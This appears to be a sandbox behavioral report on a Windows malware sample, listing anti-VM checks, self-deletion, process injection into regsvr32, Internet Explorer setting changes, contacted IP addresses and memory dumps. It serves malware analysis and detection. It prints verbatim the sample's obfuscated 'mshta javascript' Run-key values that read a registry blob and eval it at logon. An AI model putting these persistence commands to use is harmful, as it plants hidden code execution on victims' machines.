Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:ri61hmifj=\"E6\";f5W=new%20ActiveXObject(\"WScript.Shell\");z2pbtEX=\"NEqUxHikn\";yZm89e=f5W.RegRead(\"HKCU\\\\software\\\\4473aafa5e\\\\6ffbda80\");RIT4SaxCj=\"LoCpG\";eval(yZm89e);RT3mR3mvG=\"gVi6\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:NGbuezA6H=\"4vr\";C08W=new%20ActiveXObject(\"WScript.Shell\");bZkDGZ07A=\"A7zI9rX\";XMUS1=C08W.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\4473aafa5e\\\\6ffbda80\");Pp9uzZTq=\"0\";eval(XMUS1);eXwH39nIfw=\"jDX8zmK7sI\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 3020 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\splwow64.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2916 wrote to memory of 2652 N/A C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2652 wrote to memory of 2456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 3000 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2456 wrote to memory of 2964 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\831ef50525451ce1804e77eef61cdf28_JaffaCakes118.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
DZ 154.241.74.237:80 tcp
JP 126.39.65.19:8080 tcp
US 9.147.170.181:80 tcp
GB 149.155.254.69:80 tcp
US 21.93.83.235:80 tcp
DE 194.130.112.207:80 tcp
US 150.216.89.172:80 tcp
CA 142.115.147.237:443 tcp
IE 57.215.207.62:80 tcp
CN 124.236.157.115:80 tcp
US 137.42.103.100:8080 tcp
NL 217.104.65.244:80 tcp
PL 157.158.227.244:80 tcp
PA 168.205.9.231:80 tcp
VN 14.231.238.184:80 tcp
US 50.38.115.60:80 tcp
US 149.64.178.145:80 tcp
HK 155.159.36.43:80 tcp
HK 155.159.36.43:80 155.159.36.43 tcp
US 149.70.221.132:80 tcp
GB 31.105.214.214:443 tcp
AR 200.110.248.223:80 tcp
ZA 196.42.77.91:80 tcp
IT 5.85.125.217:80 tcp
IT 101.58.121.238:80 tcp
IE 57.97.205.210:80 tcp
US 99.170.238.221:80 tcp
CN 218.69.216.12:80 tcp
DE 88.79.232.185:80 tcp
MX 177.247.251.148:80 tcp
US 34.206.238.33:80 tcp
US 38.244.187.46:80 tcp
US 136.118.96.229:8080 tcp
KR 122.42.243.196:80 tcp
US 164.95.216.62:8080 tcp
US 165.109.67.76:80 tcp
TW 120.122.191.165:80 tcp
US 29.83.208.59:80 tcp
DZ 105.111.245.14:80 tcp
US 209.174.5.68:80 tcp
NL 217.162.94.149:80 tcp
FR 92.154.212.222:80 tcp
JP 126.141.30.38:80 tcp
SK 147.213.51.114:80 tcp
AT 194.50.187.207:80 tcp
JP 153.168.100.164:80 tcp
US 216.44.141.23:80 tcp
US 74.108.119.225:80 tcp
TR 94.55.170.125:80 tcp
GB 134.248.124.204:80 tcp
JP 122.218.34.239:80 tcp
JP 61.5.250.164:443 tcp
US 98.141.188.102:80 tcp
FR 109.209.55.189:80 tcp
CA 131.135.112.136:80 tcp
KR 203.241.104.4:80 tcp
US 13.144.151.228:80 tcp
US 132.56.39.192:443 tcp
US 23.159.219.85:443 tcp
HK 43.229.113.55:80 tcp
DE 53.223.46.2:80 tcp
CN 39.106.142.229:80 tcp
US 71.61.15.14:8080 tcp
GB 31.76.25.245:80 tcp
BR 181.218.214.213:443 tcp
ZA 41.169.74.174:80 tcp
US 75.19.255.205:80 tcp
US 3.157.5.124:80 tcp
VE 190.75.245.165:80 tcp
SE 159.190.244.117:80 tcp
JP 220.223.91.175:80 tcp
US 152.198.47.219:8080 tcp
DE 93.133.145.189:80 tcp
FR 176.150.6.67:80 tcp
IR 5.56.130.230:80 tcp
US 152.159.52.75:80 tcp
US 139.44.119.220:80 tcp
US 12.44.161.19:80 tcp
KR 121.145.183.184:80 tcp
N/A 10.117.223.183:80 tcp
CN 222.53.188.169:80 tcp
FR 89.159.240.185:80 tcp
CH 162.64.1.188:80 tcp
GB 88.221.88.71:80 tcp
BR 179.176.249.137:80 tcp
DE 193.100.179.159:80 tcp
US 73.74.214.192:80 tcp
CN 122.6.212.155:80 tcp
ME 31.204.215.15:80 tcp
IN 59.178.128.133:443 tcp
GB 217.34.186.33:80 tcp
CN 39.157.146.165:80 tcp
ID 36.85.51.215:80 tcp
BR 177.39.224.81:80 tcp
GB 109.235.126.102:80 tcp
RU 91.211.22.141:8080 tcp
US 214.140.234.206:80 tcp
ZA 105.251.56.235:80 tcp
CA 132.204.48.94:80 tcp
AU 203.11.225.125:80 tcp
GB 51.243.214.221:443 tcp
US 67.172.115.17:80 tcp
AR 181.230.2.132:80 tcp
ZA 197.81.243.174:80 tcp
US 11.161.107.49:443 tcp
GB 188.31.159.84:80 tcp
US 21.230.44.247:80 tcp
US 100.132.24.114:80 tcp
EG 41.239.16.90:80 tcp
US 28.204.242.64:80 tcp
GB 146.87.252.150:80 tcp
US 99.33.77.9:80 tcp
CN 211.103.81.239:80 tcp
US 12.200.232.133:80 tcp
US 72.60.233.122:80 tcp
US 33.44.190.218:80 tcp
US 35.86.76.84:80 tcp
N/A 100.87.185.242:80 tcp
DK 46.246.65.122:80 tcp
CH 178.195.177.145:80 tcp
US 9.195.162.104:80 tcp
IN 117.242.180.103:80 tcp
CN 175.172.185.147:80 tcp
CN 113.97.137.87:80 tcp
CN 218.185.210.151:443 tcp
BR 177.64.238.171:8080 tcp
US 132.237.10.89:80 tcp
N/A 10.133.92.111:80 tcp
US 73.229.198.123:80 tcp
FR 2.20.194.198:8080 tcp
HR 31.216.192.79:8080 tcp
US 45.1.56.200:80 tcp
CL 181.72.108.188:80 tcp
US 21.246.236.113:80 tcp
KR 116.40.250.10:80 tcp
US 22.40.50.27:80 tcp
KR 125.245.103.252:80 tcp
JP 160.188.198.195:8080 tcp
US 19.89.210.166:80 tcp
N/A 10.65.104.69:80 tcp
CN 110.196.19.94:80 tcp
US 75.215.53.96:80 tcp
AU 45.133.5.101:80 tcp
JP 180.12.101.152:80 tcp
BR 186.214.181.43:80 tcp
KR 59.30.180.14:80 tcp
US 3.62.185.33:80 tcp
IN 123.237.223.121:80 tcp
KR 121.252.74.221:80 tcp
IE 54.229.29.146:80 tcp
US 170.140.78.147:80 tcp
MX 201.118.44.55:80 tcp
US 166.233.31.60:80 tcp
IE 18.201.228.255:80 tcp
US 209.120.194.190:80 tcp
US 7.208.35.208:80 tcp
JP 163.135.20.147:80 tcp
BE 34.77.108.182:80 tcp
CN 115.63.208.167:80 tcp
US 143.191.206.22:80 tcp
SK 147.175.250.131:80 tcp
CN 220.186.126.212:80 tcp
US 56.182.152.165:80 tcp
KE 165.90.1.142:443 tcp
CN 125.79.1.133:80 tcp
US 18.92.32.1:80 tcp
KR 110.4.96.136:80 tcp
US 63.169.69.68:80 tcp
US 67.87.179.20:80 tcp
NL 194.123.74.14:80 tcp
US 96.99.19.94:80 tcp
GB 213.228.237.100:80 tcp
US 149.97.74.1:80 tcp
US 74.36.3.90:80 tcp
KR 222.233.95.28:80 tcp
IT 87.6.79.113:80 tcp
RU 176.56.9.115:80 tcp
N/A 100.106.72.37:80 tcp
US 47.171.223.242:80 tcp
US 28.7.72.185:80 tcp
ES 81.39.127.114:80 tcp
CN 39.165.64.242:80 tcp

Files

memory/2916-1-0x0000000002A80000-0x0000000002B80000-memory.dmp

memory/2916-2-0x00000000002A0000-0x00000000002A1000-memory.dmp

memory/2916-3-0x00000000002A0000-0x00000000002A1000-memory.dmp

memory/2916-4-0x0000000002A80000-0x0000000002B80000-memory.dmp

memory/2916-5-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2916-7-0x0000000000050000-0x000000000011A000-memory.dmp

memory/2916-11-0x0000000000050000-0x000000000011A000-memory.dmp

memory/2916-10-0x0000000000050000-0x000000000011A000-memory.dmp

memory/2916-9-0x0000000000050000-0x000000000011A000-memory.dmp

memory/2916-8-0x0000000000050000-0x000000000011A000-memory.dmp

memory/2916-13-0x0000000000050000-0x000000000011A000-memory.dmp

memory/2916-19-0x0000000000400000-0x0000000000478000-memory.dmp

memory/2652-17-0x0000000000650000-0x0000000000657000-memory.dmp

memory/2652-21-0x0000000000650000-0x0000000000657000-memory.dmp

memory/2652-22-0x0000000000090000-0x000000000015A000-memory.dmp

memory/2652-26-0x0000000000090000-0x000000000015A000-memory.dmp

memory/2652-25-0x0000000000090000-0x000000000015A000-memory.dmp

memory/2652-24-0x0000000000090000-0x000000000015A000-memory.dmp

memory/2652-23-0x0000000000090000-0x000000000015A000-memory.dmp

memory/2652-28-0x0000000000090000-0x000000000015A000-memory.dmp

memory/2456-32-0x0000000000650000-0x0000000000657000-memory.dmp

memory/2456-36-0x0000000000650000-0x0000000000657000-memory.dmp

memory/2456-40-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-37-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-41-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-44-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-50-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-51-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-49-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-48-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-47-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-46-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-45-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-43-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-39-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-38-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-42-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/3000-55-0x0000000000090000-0x000000000015A000-memory.dmp

memory/3000-56-0x0000000000090000-0x000000000015A000-memory.dmp

memory/3000-57-0x0000000000090000-0x000000000015A000-memory.dmp

memory/3000-60-0x0000000000090000-0x000000000015A000-memory.dmp

memory/3000-59-0x0000000000090000-0x000000000015A000-memory.dmp

memory/3000-58-0x0000000000090000-0x000000000015A000-memory.dmp

memory/2456-61-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2456-62-0x00000000001F0000-0x00000000002BA000-memory.dmp

memory/2964-63-0x0000000000650000-0x0000000000657000-memory.dmp

memory/2964-65-0x0000000000650000-0x0000000000657000-memory.dmp

memory/2964-67-0x0000000000150000-0x000000000021A000-memory.dmp

memory/2964-70-0x0000000000150000-0x000000000021A000-memory.dmp

memory/2964-69-0x0000000000150000-0x000000000021A000-memory.dmp

memory/2964-68-0x0000000000150000-0x000000000021A000-memory.dmp

memory/2964-66-0x0000000000150000-0x000000000021A000-memory.dmp